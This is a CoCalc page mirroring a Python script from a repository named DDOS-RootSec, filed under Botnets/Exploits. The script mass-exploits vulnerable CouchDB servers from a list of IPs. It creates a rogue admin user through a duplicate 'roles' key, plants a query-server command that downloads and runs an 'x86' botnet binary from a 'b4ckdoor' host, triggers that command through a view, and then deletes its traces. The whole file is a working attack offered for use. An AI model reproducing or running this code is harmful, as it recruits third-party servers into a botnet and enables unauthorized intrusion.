Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/COUCH DB/couchdb.py
5038 views
1
#!/usr/bin/env python

2
from requests.auth import HTTPBasicAuth

3
import random

4
import requests

5
import re

6
import sys

7
from threading import Thread

8
from time import sleep

9
	

10


11
ips = open(sys.argv[1], "r").readlines()

12
Rdatabases = ["/a564r6fusmg","/dyejdffyjdxryj","/esreghsrgfbgrsb","/sfafdbsrdgjqef","/fyukddyuodyj","/yfjdued6yjdsza","/wefrhnwgerhgsrh","/sfdrebwbef","/fdfgffrgfdsg"]

13


14
def getVersion(ip):

15
	version = requests.get(ip).json()["version"]

16
	return version

17
 

18
def exploit(ip):

19
	global Rdatabases

20
	try:

21
		try:

22
			if sys.argv[2] == "-r":

23
				cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"

24
			elif sys.argv[2] == "-c":

25
                		cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"

26
                	elif sys.argv[2] == "-w":

27
				cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root;"

28
			elif sys.argv[2] == "-x":

29
                		cmd = "cd /tmp; wget http://b4ckdoor/x86; curl wget http://b4ckdoor/x86 -O; chmod 777 x86; ./x86 root; "

30
			elif not sys.argv[2]:

31
				print "NOT ENOUGH ARGUMENTS!"

32
				sys.exit(0)

33
		except SyntaxError as e:

34
			print "\n   Options: (-r|-c|-w|-x)"

35
		db_ = random.choice(Rdatabases)

36
		db = db_

37
		ip = ip.rstrip("\n")

38
		ip = "http://"+ip+":5984"

39
		version = getVersion(ip)

40
		#print("[*] Detected CouchDB Version " + version)

41
		vv = version.replace(".", "")

42
		v = int(version[0])

43
		if v == 1 and int(vv) <= 170:

44
			version = 1

45
		elif v == 2 and int(vv) < 211:

46
			version = 2

47
		else:

48
			#print("[-] Version " + version + " not vulnerable.")

49
			sys.exit()

50
		with requests.session() as session:

51
			#print("[*] Attempting %s Version %d"%(ip,v))

52
			session.headers = {"Content-Type": "application/json"}

53
	 

54
			try:

55
				payload = '{"type": "user", "name": "'

56
				payload += "guest"

57
				payload += '", "roles": ["_admin"], "roles": [],'

58
				payload += '"password": "guest"}'

59


60
				pr = session.put(ip + "/_users/org.couchdb.user:guest",

61
					data=payload)

62


63
				#print("[+] User guest with password guest successfully created.")

64
			except requests.exceptions.HTTPError:

65
				sys.exit()

66
			session.auth = HTTPBasicAuth("guest", "guest")

67
			try:

68
				if version == 1:

69
					session.put(ip + "/_config/query_servers/cmd",

70
							data='"' + cmd + '"')

71
					#print("[+] Created payload at: " + ip + "/_config/query_servers/cmd")

72
				else:

73
					host = session.get(ip + "/_membership").json()["all_nodes"][0]

74
					session.put(ip + "/_node/" + ip + "/_config/query_servers/cmd",

75
							data='"' + cmd + '"')

76
					#print("[+] Created payload at: " + ip + "/_node/" + host + "/_config/query_servers/cmd")

77
			except requests.exceptions.HTTPError as e:

78
				sys.exit()

79
	 

80
			try:

81
				session.put(ip + db)

82
				session.put(ip + db + "/zero", data='{"_id": "HTP"}')

83
			except requests.exceptions.HTTPError:

84
				sys.exit()

85
	 

86
			# Execute payload

87
			try:

88
				if version == 1:

89
					session.post(ip + db + "/_temp_view?limit=10",

90
							data='{"language": "cmd", "map": ""}')

91
				else:

92
					session.post(ip + db + "/_design/zero",

93
							data='{"_id": "_design/zero", "views": {"god": {"map": ""} }, "language": "cmd"}')

94
				print("[+] Command executed: " + cmd)

95
			except requests.exceptions.HTTPError:

96
				sys.exit()

97


98
			#print("[*] Cleaning up.")

99


100
			# Cleanup database

101
			try:

102
				session.delete(ip + db)

103
			except requests.exceptions.HTTPError:

104
				sys.exit()

105
	 

106
			# Cleanup payload

107
			try:

108
				if version == 1:

109
					session.delete(ip + "/_config/query_servers/cmd")

110
				else:

111
					host = session.get(ip + "/_membership").json()["all_nodes"][0]

112
					session.delete(ip + "/_node" + host + "/_config/query_servers/cmd")

113
			except requests.exceptions.HTTPError:

114
				sys.exit()

115
	except:

116
		pass

117
for ip in ips:

118
	try:

119
		hoho = Thread(target=exploit, args=(ip,))

120
		hoho.start()

121
		sleep(0.001)

122
	except:

123
		pass

124


125